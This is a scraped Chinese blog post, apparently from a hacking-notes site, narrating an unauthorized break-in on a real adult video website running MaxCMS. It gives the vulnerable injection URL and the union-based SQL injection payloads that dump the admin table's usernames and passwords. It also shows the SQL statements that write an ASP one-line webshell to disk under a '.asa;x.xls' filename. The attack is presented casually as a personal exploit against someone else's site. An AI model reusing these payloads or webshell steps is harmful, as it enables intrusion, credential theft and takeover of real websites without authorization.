zoukankan      html  css  js  c++  java
  • 【渗透笔记】拿下某小H网的全过程

    自从班上A片小王子的7个T资源被封了以后,本小白为造福全班同学,尝试拿下个小H网,先用webrobot搜某些只有小H网才会出现的关键词

    本以为直接导出放御剑里跑就行了,然并软。于是用awvs扫了一下,也没什么用。从cms下手吧放进椰树里

    百度一下maxcms的漏洞看到这样一条 http://www.2cto.com/index.php/364.html发现注入点 http://www.xxxxx.com/inc/ajax.asp?action=videoscore&id=11 ,放进sqlmap里跑

    当然没那么容易出了点小错误

    没办法,试试最近刚学的联合注入。先猜表名,输入%20and%20exists%20(select%20*%20from%20m_manager)存在表名m_manager

    把前面的*改成列名,结合前面sqlmap跑出的信息,猜到列名是m_username和m_pwd

    判断列的长度,发现3为正常,4为错误,说明长度为3

    %20and%201=2%20union%20select%201,2,3%20from%20m_manager,把2和3替换成m_username和m_pwd,直接爆出

    好坏的cms呀

    进后台了

    接下来就是穿马了,结果00截断截不了,本来想在网站配置插一句话的,试了好多次都没什么用~~后台已经插坏好几个了~~正当我绝望时,好友分享给我这http://bybmo.lofter.com/post/1d6686be_8725023?sharefrom=lofter-android-4.7.3&shareto=qq

    create table cmd (a varchar(50)) //建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50 NO.2insert into cmd (a) values ('一句话木马')//在表cmd的a字段插入一句话木马 NO.3select * into [a] in 'd:wwwrootxxxxwwwroot1.asa;x.xls' 'excel 4.0;' from cmd//把cmd表a的内容导出到路径d:wwwrootxxxxwwwroot\的EXCEL文件,网站物理路径可以在首页找到NO.4drop table cmd//删除建立的cmd表 http://www.XXX.com/1.asa;x.xls

    发现其实影音先锋码可以直接在后台找到的

  • 相关阅读:
    EF框架 处理decimal字段 Sum() 遇到NULL时的特殊处理
    RSA加密解密及RSA签名和验证
    SQL 类似switch的东东用法
    js抛物线动画
    MyBatis的结果映射(resultMap)
    mybatis中#和$符号的区别
    MyBatis 中Mapper.xml中注意事项
    MyBatis sql映射器 Mapper
    MyBatis的自定义别名和内置别名
    MyBatis简单认识(入门)
  • 原文地址:https://www.cnblogs.com/cnhacker/p/6999101.html
Copyright © 2011-2022 走看看